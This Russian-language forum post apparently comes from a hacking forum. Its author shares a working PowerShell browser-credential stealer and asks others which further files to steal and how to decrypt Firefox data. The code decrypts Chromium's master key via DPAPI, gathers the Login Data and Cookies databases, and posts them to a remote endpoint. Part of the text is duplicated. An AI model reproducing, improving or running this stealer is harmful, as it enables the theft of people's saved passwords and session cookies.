Привет, поцаны некоторое время назад я начал эксперементировать с OpenAI и результат получился, пока
не буду делать [Статью] с опубликованием полностью того каким образом я делал это дело, просто нужны советы,
возможно в данный момент я делаю что то не так, но ход моих мыслей примерно такой:
Впринципе код стиллера на данный момент написан на Powershell, и думаю не имеет проблем в портировании
на другие языки, а если и имеет то будет очень легким.
Я не собираюсь это каким либо образом торговать и что то подобное, просто интересно, в чем логика моя не такая,
ведь по сути я расшифровал мастер ключ и отправлю с базами данных его в панель, что бы в панели до-расшифровывать
Я знаю что в можно сразу в пауршелле с помощью DLL под NET сразу расшифровать, но смысл?
Есть ли еще какие файлы которые стоит утягивать с PC???
Че еще делать, как расшифровывается Firefox?
Понабросайте идей, впринципе разработка будет открытой
не буду делать [Статью] с опубликованием полностью того каким образом я делал это дело, просто нужны советы,
возможно в данный момент я делаю что то не так, но ход моих мыслей примерно такой:
Впринципе код стиллера на данный момент написан на Powershell, и думаю не имеет проблем в портировании
на другие языки, а если и имеет то будет очень легким.
Python:
$appDataPath = $env:appdata
$localAppDataPath = $env:localappdata
$mainresult = @()
Get-ChildItem -Path $appDataPath, $localAppDataPath -Recurse -Filter "Local State" -File | ForEach-Object {
$result = @()
$contentLocalState = Get-Content -Raw -Path $_.FullName | ConvertFrom-Json
$encryptedKey = [System.Convert]::FromBase64String($contentLocalState.os_crypt.encrypted_key)
$encryptedKey = $encryptedKey[5..$encryptedKey.Length];
$masterKey = [System.Security.Cryptography.ProtectedData]::Unprotect($encryptedKey, $null, "CurrentUser")
$masterKey64 = [System.Convert]::ToBase64String($masterKey)
$logdb = @()
$cocdb = @()
Get-ChildItem -Path $_.Directory -Recurse -Filter "Login Data" -File | ForEach-Object {
$contentDb = Get-Content -Path $_.FullName
$logdb += $contentDb
}
Get-ChildItem -Path $_.Directory -Recurse -Filter "Cookies" -File | ForEach-Object {
$contentDb = Get-Content -Path $_.FullName
$cocdb += $contentDb
}
$result += @{ MasterKey = $masterKey64; LoginDatas = $logdb; Cookies = $cocdb }
$mainresult += $result
}
$json = $mainresult | ConvertTo-Json
$response = Invoke-WebRequest -Method POST -Uri "https://example.com/api/endpoint" -Body $json -ContentType "application/json"
Я не собираюсь это каким либо образом торговать и что то подобное, просто интересно, в чем логика моя не такая,
ведь по сути я расшифровал мастер ключ и отправлю с базами данных его в панель, что бы в панели до-расшифровывать
Я знаю что в можно сразу в пауршелле с помощью DLL под NET сразу расшифровать, но смысл?
Есть ли еще какие файлы которые стоит утягивать с PC???
Че еще делать, как расшифровывается Firefox?
Понабросайте идей, впринципе разработка будет открытой